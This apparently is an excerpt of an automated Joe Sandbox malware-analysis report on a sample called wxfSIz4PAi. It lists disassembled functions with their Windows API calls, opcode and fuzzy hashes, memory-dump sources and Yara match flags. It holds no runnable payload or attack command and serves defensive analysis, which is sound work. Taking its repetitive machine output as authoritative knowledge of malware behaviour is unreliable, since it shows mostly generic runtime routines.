                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                              • Opcode ID: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
                                                                                                                                                                                                                              • Instruction ID: ee19b3e2510f7423959140ec21889b16034e20938e88c6190324d52fb0663b51
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8601F572649215AEE6395FB9BDC56572A54DB01338720033FF214B12F0EA794C16954C
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                                              • Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
                                                                                                                                                                                                                              • Instruction ID: 1658229377cee04dc82e6d0d1a2bd98c50e93d10c71daed8373b411a3bcd07ae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06F0A935748E1D26D3222B756C0DF6B2726EBC17B1F2501E4F939D6294EF21EC024559
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                                              • Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
                                                                                                                                                                                                                              • Instruction ID: dffb23d06d1e15ef1aad1c845134e5c8e8eacf90562cc3591d5b7c0101a08115
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BDF0F43178871026C2227B367C0ABDB26299FC1775F22052FF91D92291EF2CDCC2815D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000), ref: 0041729F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                              • String ID: -@
                                                                                                                                                                                                                              • API String ID: 3177248105-2564449678
                                                                                                                                                                                                                              • Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
                                                                                                                                                                                                                              • Instruction ID: 7e42d4c6809e44159ca8b586cb0097734ec1077dc4da662fe3f049ba49388dcf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B01F7367492279BC7314B699C44A977BB8AF55760B500671F909D7240DB34DC43C6E8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 05B61B30
                                                                                                                                                                                                                              • std::system_error::system_error.LIBCPMT ref: 05B61B3F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                              • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                              • Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
                                                                                                                                                                                                                              • Instruction ID: 6e6b2a7f123702e0d247da9db79ec719f5580e821bcf6e358d92346ab7dcbcf8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50F0F67160031DBBCF10AA988C44FE97B98DF09690F15C0B5ED4477180E7BDB904C2E8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                              • std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                              • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                              • Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
                                                                                                                                                                                                                              • Instruction ID: e154b9f444e369befffee57ff699e9c141b04c4d0561678f3d19f5bf610271a8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AEF0226280031CB7DB10BAA18C02FEA7B988F0A754F21C03BFD40361E0E77D5A0482ED
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002), ref: 00413A8C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
                                                                                                                                                                                                                              • Instruction ID: 222490b34c4e53a5feae2b87ffa662e2080e553be967456abbd25fb90b6b76cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EF08130A10218FBDB109F91DC09BAEBFB8EF54752F400069F809A2290DB344E45CA9C
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
                                                                                                                                                                                                                              • Instruction ID: 51a076d8a8ad3d59fd4f43a00c90828ec243c481c7252864214fffb0d9495081
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4717331A0421E9FCB61CF58CC84ABFBB76FF45351F2841A9E83567190D770AA41CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
                                                                                                                                                                                                                              • Instruction ID: b33920a143986800139fcf22d81ba1a33bebe7e0c53b62ede7835c02ac38fde1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E712A71D062969BCB308F94C844AFFBB76EF41360F14022BE91457280D774ACE1C7AA
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
                                                                                                                                                                                                                              • Instruction ID: e00a5ce4fb7ede9ad3221f3142939c84e7fbe5a5e86c5397a79b4ec3e07c9ea0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B41D136B002089FDB24DF78C884A6DB3F6FF85314B1645A9D566EB290DB71B905CB81
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
                                                                                                                                                                                                                              • Instruction ID: 119d67276799711db09ecd5bf14b9939420992e10a89990823b09dedeceb6b84
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F941E232E00700EBCB15DF79C880A9EB7B1EF89318B1545AAE515EB392D634AD41CB84
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0041197C,?,00000000,?,00000001,?,?,00000001,0041197C,?), ref: 0041B34D
                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0041B385
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B3D6
                                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DD1,?), ref: 0041B3E8
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0041B3F1
                                                                                                                                                                                                                                • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 313313983-0
                                                                                                                                                                                                                              • Opcode ID: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
                                                                                                                                                                                                                              • Instruction ID: fe6b59a793102c77a27ef18a3bbb39662c21b96f940faf78fbed62ac6a6f166a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3831BF72A0021A9BDB249F65CC41EEF7BA5EB40310F04012EFC14D7291EB39DDA1CB99
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 05B7E673
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 05B7E696
                                                                                                                                                                                                                                • Part of subcall function 05B77CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B77CDE
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 05B7E6BC
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7E6CF
                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 05B7E6DE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                                                                                              • Opcode ID: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
                                                                                                                                                                                                                              • Instruction ID: 42874ee288cfdcfb763242f08e0feb91484538916bab786f9574dcf67e84d751
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C201DF7270521D7F27315ABA5C8CC7B7A6DEEC2AA071401F9F925D2250EE61EC02E1BD
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0041E40C
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E42F
                                                                                                                                                                                                                                • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E455
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041E468
                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E477
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                                                                                              • Opcode ID: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
                                                                                                                                                                                                                              • Instruction ID: e222fc366bdc9891f1000934aff4c77bc857fdd668f389f9b834644977e06484
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9001847AA012157B27211AB75C8CDFB6A6DDEC6FA4315012AFD08D3201DE688C82C5B9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,05B725ED,05B77307,?,05B76FAE,00000001,00000364,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B77009
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7703E
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B77065
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 05B77072
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 05B7707B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                                              • Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
                                                                                                                                                                                                                              • Instruction ID: 46ce51c7386bddb831631b1dbd2c654ca6dcee3ed94abc9742a122ca1a3abc0c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9001F97674460C27973267756C88E7F2A1BEBC127072001F8F436A2290FE21EC0241A9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416DD7
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416DFE
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00416E0B
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00416E14
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                                              • Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
                                                                                                                                                                                                                              • Instruction ID: 6e49a9887b0250ccd633565296769d6b3062fe87a49412782ccaa8615f8c8364
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C201F9363847106792217676BC85EEB262D9BC5374763027FF819922D2EF3DCC92505D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041ED86
                                                                                                                                                                                                                                • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                                                                                                • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041ED98
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041EDAA
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041EDBC
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041EDCE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
                                                                                                                                                                                                                              • Instruction ID: d5ef32133b98e4fb2412931fa35fae6bc57e2fe493cbd1108eefdbae164f4dde
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DF04F32544310ABCA20EB6AF885DDB73E9BA44714755181AF848D7640C638FCC0865D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B75537
                                                                                                                                                                                                                                • Part of subcall function 05B76501: HeapFree.KERNEL32(00000000,00000000,?,05B7F288,?,00000000,?,00000000,?,05B7F52C,?,00000007,?,?,05B7F920,?), ref: 05B76517
                                                                                                                                                                                                                                • Part of subcall function 05B76501: GetLastError.KERNEL32(?,?,05B7F288,?,00000000,?,00000000,?,05B7F52C,?,00000007,?,?,05B7F920,?,?), ref: 05B76529
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B75549
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7555C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7556D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7557E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
                                                                                                                                                                                                                              • Instruction ID: 6f21541a41c2e5a2e4c85efebad794aeb683b403d0868f4b18064965e7b279d5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4F054B0D115189BCB37AF64FC446153761FB0461031275AEF12452278DF3667919FCB
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004152D0
                                                                                                                                                                                                                                • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                                                                                                • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004152E2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004152F5
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00415306
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00415317
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
